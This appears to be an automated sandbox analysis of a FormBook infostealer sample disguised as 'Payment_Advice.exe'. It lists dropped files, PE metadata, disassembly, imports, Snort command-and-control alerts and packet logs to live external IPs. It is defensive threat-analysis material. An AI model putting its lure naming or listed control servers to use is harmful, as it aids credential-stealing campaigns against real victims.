                                                                                                  Preview:K11I4q66q995x4741u8v730840620851I..ToolbarConstants ToolTipConstants..7s14l08t0bj..FontConstants FontConstants..25Z06aI1f2liiG8AQ4J805MMsvnbv4iW6nZ71BB8kKLg157319v08y7Zcm05jO5454Nd5cH1B861q2kL46368EI7Qk..ToolTipConstants ToolTipConstants..j9567c95qVF73yU4I38EO28655W6087FH7HsAV30vsST4yT14EJ4hGpL9eK85VmDhb63mv0ngzT6BWyL5E71Ph7ZnOyPQO5W4k3qe8z4Vbx2961nlL3f1P2603e7N4l0G0133el641285U1y..GuiDateTimePicker FileConstants..3FqlQR961fV752v4cz1aR396qvUdtI4u213013YS8bi0t..ColorConstants GuiDateTimePicker..A4VP1s11rUvXIR82EzgIzyU33Pl6j27oP7F976ex58hK2O163AZ7936062HeF35ITaz7g47X81127J9e49gC7a00162BQdcahxY2w70GQ4K3485RuT5VK..ToolTipConstants FileConstants..

                                                                                                  C:\Users\user\AppData\Local\Temp\RarSFX0\uaabfk.icm

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):534
                                                                                                  Entropy (8bit):5.566200256464235
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:CzRBOzRFFfbaqny2LBYnauTIUGAqP9RmAcVdh5WZyq:CzbOdfbacy6YbumAcVdh5WZyq
                                                                                                  MD5:D29F9DB19D138B1D9FAA12EBD0DDB541
                                                                                                  SHA1:5E2AD088BD09B950BDC501D7AEA589351356F8B0
                                                                                                  SHA-256:94391F43F8FB6582CEF9F9368D56A43721826AEE67A05BC092D125B895239E0B
                                                                                                  SHA-512:04B5544A47830DC449938256601F8D2BCDD7110D766E31A3F9C7D4DA8028309968A5C30455149E101F1FD90E31B479B67F56766994616D7DD3C11DE5F32CAB0A
                                                                                                  Malicious:false
                                                                                                  Preview:hF2gsx3i60QuAB24U6xnv008E1r8PTZi58o47x15qEmU8532NW553R2YdA858l1lX8y8X8q119o03NZX84rTH02P5..FontConstants UpDownConstants..k8z946P8xv963vgi07Y8963M074V404dOm6fLq89l8n61U246q200w57i088DmXs13lD5491WP178941oR91eA4W225mvRYEeoq476pt7U5m6X2DF7364gE8CY3165ic6xY8O39LB1F98E..FontConstants ComboConstants..033R3v4hLM3ijpL72a3126YP4j69gp00169V00Kf42V0959t4v200WmQH5999bEwXc9ws5M9f7871347x37m852S9f427J0sV341X2kbsaXdvo8AHR4..TreeViewConstants StructureConstants..81Ie97Z1DP6g3zl6k94u8Mzx98B542T34yB3Z5HNBG3i..StructureConstants ToolTipConstants..

                                                                                                  C:\Users\user\AppData\Local\Temp\RarSFX0\vplcux.dat

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):634
                                                                                                  Entropy (8bit):5.5604978590285326
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:XZLF2XQFZKUApbGyQuS2IUN8UAnSbn52Iq:pLF2XIKJMyQJvUGUySbn7q
                                                                                                  MD5:58C8740DD9D8C9A6393D4321F8E635B4
                                                                                                  SHA1:3915412FA75ED57EBB025606C73E4F796FD35191
                                                                                                  SHA-256:9072F3031B047CCCFACF32609507C48F2BBF25F8EDC27AB2847CC73245E45294
                                                                                                  SHA-512:92894A63750F1153169FFD46A273F31AAEF249FC0E54454B45C00DFEA5E23BC524BCC8581CCB1C922F7FB8B8361052C779B1CE25B83A3288CCE06D31E4D710DF
                                                                                                  Malicious:false
                                                                                                  Preview:427wm2T92A9z5Ipv05HkVEb6E0GK9uDYt18UjFDqX2VX3p8c498z5I36nKs99U513KO6z3eH6..UpDownConstants ToolbarConstants..55a3P468J3d5hY6989l63jG3f0Bs6916Ts78Z9560f590..FileConstants ButtonConstants..a2e16V92h7088XS1Yo1C4Dy42ABa21X62SfMJ0FG3g51T6CH6OBm5F4jS963vo4681No94672nPE8I23..ToolTipConstants ToolbarConstants..760KH0a177W37V8IZ7OEl4X93G38Q8Kr2hM0imRfa3r75O2wN9kbD5jW6r1417l9730dmvk51Yc3053J1b52349nj2907idr009EK166uw36h164..StructureConstants ComboConstants..Y66Z444vhGC73hDTHe82u7DuB311058mWxv09Xv0v7173fr73m9543dbf764691Uvj590mHjYb9Ud3Muzma2a122ok12hnG8sl8FAg2148IUKfVh1Bz6E8352Ca817CPb7Txpge79b346L..StructureConstants ToolTipConstants..

                                                                                                  C:\Users\user\temp\qqftv.bmp

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):77
                                                                                                  Entropy (8bit):4.820575548015795
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:YRRvuf1lXhONvkY/ndYmN8wV/Isn:AvgDO9k4WgAs
                                                                                                  MD5:7A660CE753E331647665C2DD94F4B0D6
                                                                                                  SHA1:737696F79AAD5994703C6CDCD7008CBF4CC641FE
                                                                                                  SHA-256:33D2BE393F9CB8EA01161D1D38610B72B7D7C6C65F51ECCD6374316E856475A3
                                                                                                  SHA-512:19B9630022B367801653FBB37CE99CD8CC7B5569C361CEF78B51B3E909648DF93EB0FFE047E636700BD8C1014355010B0D9A3F1E19E6347BF914A06F93D7D999
                                                                                                  Malicious:false
                                                                                                  Preview:[S3tt!ng]..stpths=%userprofile%..Key=..Dir3ctory=ftpc..ExE_c=ewdbwwfpdh.bmp..

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.79974903583339
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:Payment_Advice.exe
                                                                                                  File size:1'131'860 bytes
                                                                                                  MD5:15b3674e7fe8c5fe5284bc290a09ecb8
                                                                                                  SHA1:222c994082583413a9ea054eaf41583712702a53
                                                                                                  SHA256:eb53ed1886ae853bdeb51270964242b2b03373388e65acc012c8fe0485b81514
                                                                                                  SHA512:848cd01f78bcd132bdd724f83cc99957d9110a569f1434528820f58b185a258a67522b2914d29d4670ddafe84d8fe760c021a55748cf53b7a66a01ad5470d2e6
                                                                                                  SSDEEP:24576:MTbBv5rUDkdwJ5nNr75xArQX8k18FGa6mPcyGJzQfs8FiNGVDg:OB/u5nd7HbXboGBQfoo0
                                                                                                  TLSH:8F351212B9C258B2C4721E326A757B20AA7C7C301FA58EDFA3E4952DDD715C1D331BA2
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                                  File Icon

                                                                                                  Icon Hash:146c5b13131a573e

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x41f530
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:1
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:1
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:1
                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  call 00007F4311853B8Bh
                                                                                                  jmp 00007F431185349Dh
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  mov esi, ecx
                                                                                                  call 00007F43118462E7h
                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                  mov eax, ecx
                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                  ret
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  mov esi, ecx
                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                  push eax
                                                                                                  call 00007F431185692Fh
                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                  pop ecx
                                                                                                  je 00007F431185362Ch
                                                                                                  push 0000000Ch
                                                                                                  push esi
                                                                                                  call 00007F4311852BE9h
                                                                                                  pop ecx
                                                                                                  pop ecx
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 0Ch
                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                  call 00007F4311846262h
                                                                                                  push 0043BEF0h
                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                  push eax
                                                                                                  call 00007F43118563E9h
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 0Ch
                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                  call 00007F43118535A8h
                                                                                                  push 0043C0F4h
                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                  push eax
                                                                                                  call 00007F43118563CCh
                                                                                                  int3
                                                                                                  jmp 00007F4311857E67h
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push 00422900h
                                                                                                  push dword ptr fs:[00000000h]

                                                                                                  Rich Headers

                                                                                                  Programming Language:
                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x19658.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000x233c.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x31bdc0x31c00False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x330000xaec00xb000False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0x3e0000x247200x1000False0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .didat0x630000x1900x200False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x640000x196580x19800False0.7920113357843137data7.266223306948891IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x7e0000x233c0x2400False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  PNG0x647640xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                  PNG0x652ac0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                  RT_ICON0x668580x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.36585365853658536
                                                                                                  RT_ICON0x66ec00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.4489247311827957
                                                                                                  RT_ICON0x671a80x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.555327868852459
                                                                                                  RT_ICON0x673900x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.5371621621621622
                                                                                                  RT_ICON0x674b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.6327292110874201
                                                                                                  RT_ICON0x683600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.733754512635379
                                                                                                  RT_ICON0x68c080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.6970046082949308
                                                                                                  RT_ICON0x692d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.4848265895953757
                                                                                                  RT_ICON0x698380xd5eaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9983382637595413
                                                                                                  RT_ICON0x76e240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.4654564315352697
                                                                                                  RT_ICON0x793cc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.5567542213883677
                                                                                                  RT_ICON0x7a4740x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.7008196721311475
                                                                                                  RT_ICON0x7adfc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5780141843971631
                                                                                                  RT_DIALOG0x7b2640x286dataEnglishUnited States0.5092879256965944
                                                                                                  RT_DIALOG0x7b4ec0x13adataEnglishUnited States0.60828025477707
                                                                                                  RT_DIALOG0x7b6280xecdataEnglishUnited States0.6991525423728814
                                                                                                  RT_DIALOG0x7b7140x12edataEnglishUnited States0.5927152317880795
                                                                                                  RT_DIALOG0x7b8440x338dataEnglishUnited States0.45145631067961167
                                                                                                  RT_DIALOG0x7bb7c0x252dataEnglishUnited States0.5757575757575758
                                                                                                  RT_STRING0x7bdd00x1e2dataEnglishUnited States0.3900414937759336
                                                                                                  RT_STRING0x7bfb40x1ccdataEnglishUnited States0.4282608695652174
                                                                                                  RT_STRING0x7c1800x1b8dataEnglishUnited States0.45681818181818185
                                                                                                  RT_STRING0x7c3380x146dataEnglishUnited States0.5153374233128835
                                                                                                  RT_STRING0x7c4800x46cdataEnglishUnited States0.3454063604240283
                                                                                                  RT_STRING0x7c8ec0x166dataEnglishUnited States0.49162011173184356
                                                                                                  RT_STRING0x7ca540x152dataEnglishUnited States0.5059171597633136
                                                                                                  RT_STRING0x7cba80x10adataEnglishUnited States0.49624060150375937
                                                                                                  RT_STRING0x7ccb40xbcdataEnglishUnited States0.6329787234042553
                                                                                                  RT_STRING0x7cd700xd6dataEnglishUnited States0.5747663551401869
                                                                                                  RT_GROUP_ICON0x7ce480xbcdata0.6170212765957447
                                                                                                  RT_MANIFEST0x7cf040x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                  Possible Origin

                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  192.168.2.8142.234.186.9849713802031412 10/06/23-15:46:24.770092TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.8142.234.186.98
                                                                                                  192.168.2.8170.33.13.24649714802031412 10/06/23-15:47:05.527481TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971480192.168.2.8170.33.13.246
                                                                                                  192.168.2.875.2.115.19649721802031412 10/06/23-15:48:47.739146TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.875.2.115.196
                                                                                                  192.168.2.891.195.240.1949715802031412 10/06/23-15:47:26.584409TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.891.195.240.19
                                                                                                  192.168.2.866.96.160.14049719802031412 10/06/23-15:48:06.495640TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.866.96.160.140
                                                                                                  192.168.2.877.222.40.14749711802031412 10/06/23-15:46:05.442049TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.877.222.40.147
                                                                                                  192.168.2.862.72.50.24449716802031412 10/06/23-15:47:46.016751TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.862.72.50.244
                                                                                                  192.168.2.8103.224.182.24249720802031412 10/06/23-15:48:27.268039TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.8103.224.182.242

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 6, 2023 15:46:05.114090919 CEST4971180192.168.2.877.222.40.147
                                                                                                  Oct 6, 2023 15:46:05.441755056 CEST804971177.222.40.147192.168.2.8
                                                                                                  Oct 6, 2023 15:46:05.441936970 CEST4971180192.168.2.877.222.40.147
                                                                                                  Oct 6, 2023 15:46:05.442049026 CEST4971180192.168.2.877.222.40.147
                                                                                                  Oct 6, 2023 15:46:05.769395113 CEST804971177.222.40.147192.168.2.8
                                                                                                  Oct 6, 2023 15:46:05.930954933 CEST4971180192.168.2.877.222.40.147
                                                                                                  Oct 6, 2023 15:46:06.205346107 CEST804971177.222.40.147192.168.2.8
                                                                                                  Oct 6, 2023 15:46:06.205364943 CEST804971177.222.40.147192.168.2.8
                                                                                                  Oct 6, 2023 15:46:06.205548048 CEST4971180192.168.2.877.222.40.147
                                                                                                  Oct 6, 2023 15:46:06.205548048 CEST4971180192.168.2.877.222.40.147
                                                                                                  Oct 6, 2023 15:46:06.258512020 CEST804971177.222.40.147192.168.2.8
                                                                                                  Oct 6, 2023 15:46:06.258610010 CEST4971180192.168.2.877.222.40.147
                                                                                                  Oct 6, 2023 15:46:24.622704983 CEST4971380192.168.2.8142.234.186.98
                                                                                                  Oct 6, 2023 15:46:24.769887924 CEST8049713142.234.186.98192.168.2.8
                                                                                                  Oct 6, 2023 15:46:24.770021915 CEST4971380192.168.2.8142.234.186.98
                                                                                                  Oct 6, 2023 15:46:24.770092010 CEST4971380192.168.2.8142.234.186.98
                                                                                                  Oct 6, 2023 15:46:24.918459892 CEST8049713142.234.186.98192.168.2.8
                                                                                                  Oct 6, 2023 15:46:24.918895960 CEST8049713142.234.186.98192.168.2.8
                                                                                                  Oct 6, 2023 15:46:24.918935061 CEST8049713142.234.186.98192.168.2.8
                                                                                                  Oct 6, 2023 15:46:24.918970108 CEST8049713142.234.186.98192.168.2.8
                                                                                                  Oct 6, 2023 15:46:24.919019938 CEST4971380192.168.2.8142.234.186.98
                                                                                                  Oct 6, 2023 15:46:24.919068098 CEST4971380192.168.2.8142.234.186.98
                                                                                                  Oct 6, 2023 15:46:24.919080019 CEST4971380192.168.2.8142.234.186.98
                                                                                                  Oct 6, 2023 15:47:05.364356041 CEST4971480192.168.2.8170.33.13.246
                                                                                                  Oct 6, 2023 15:47:05.522573948 CEST8049714170.33.13.246192.168.2.8
                                                                                                  Oct 6, 2023 15:47:05.527404070 CEST4971480192.168.2.8170.33.13.246
                                                                                                  Oct 6, 2023 15:47:05.527481079 CEST4971480192.168.2.8170.33.13.246
                                                                                                  Oct 6, 2023 15:47:06.001693964 CEST8049714170.33.13.246192.168.2.8
                                                                                                  Oct 6, 2023 15:47:06.003338099 CEST8049714170.33.13.246192.168.2.8
                                                                                                  Oct 6, 2023 15:47:06.003484011 CEST4971480192.168.2.8170.33.13.246
                                                                                                  Oct 6, 2023 15:47:06.006469965 CEST8049714170.33.13.246192.168.2.8
                                                                                                  Oct 6, 2023 15:47:06.007354975 CEST4971480192.168.2.8170.33.13.246
                                                                                                  Oct 6, 2023 15:47:06.320528030 CEST8049714170.33.13.246192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.298206091 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:26.584180117 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.584408998 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:26.584408998 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:26.904335976 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.904655933 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.904701948 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:26.904704094 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.904755116 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.904795885 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:26.904799938 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.904849052 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.904891968 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:26.904896021 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.904946089 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.904987097 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:26.904994011 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.905041933 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:26.905081034 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.086050987 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.187711954 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.187793016 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.187803984 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.187947035 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.187953949 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.188000917 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.188004017 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.188043118 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.188052893 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.188091040 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.188102007 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.188143969 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.188153982 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.188196898 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.188205004 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.188246965 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.188255072 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.188302040 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.188302994 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.188343048 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:27.372390985 CEST804971591.195.240.19192.168.2.8
                                                                                                  Oct 6, 2023 15:47:27.372481108 CEST4971580192.168.2.891.195.240.19
                                                                                                  Oct 6, 2023 15:47:45.857446909 CEST4971680192.168.2.862.72.50.244
                                                                                                  Oct 6, 2023 15:47:45.992898941 CEST804971662.72.50.244192.168.2.8
                                                                                                  Oct 6, 2023 15:47:45.992976904 CEST4971680192.168.2.862.72.50.244
                                                                                                  Oct 6, 2023 15:47:46.016751051 CEST4971680192.168.2.862.72.50.244
                                                                                                  Oct 6, 2023 15:47:46.152364969 CEST804971662.72.50.244192.168.2.8
                                                                                                  Oct 6, 2023 15:47:46.152431965 CEST804971662.72.50.244192.168.2.8
                                                                                                  Oct 6, 2023 15:47:46.152777910 CEST804971662.72.50.244192.168.2.8
                                                                                                  Oct 6, 2023 15:47:46.152915955 CEST4971680192.168.2.862.72.50.244
                                                                                                  Oct 6, 2023 15:47:46.154462099 CEST4971680192.168.2.862.72.50.244
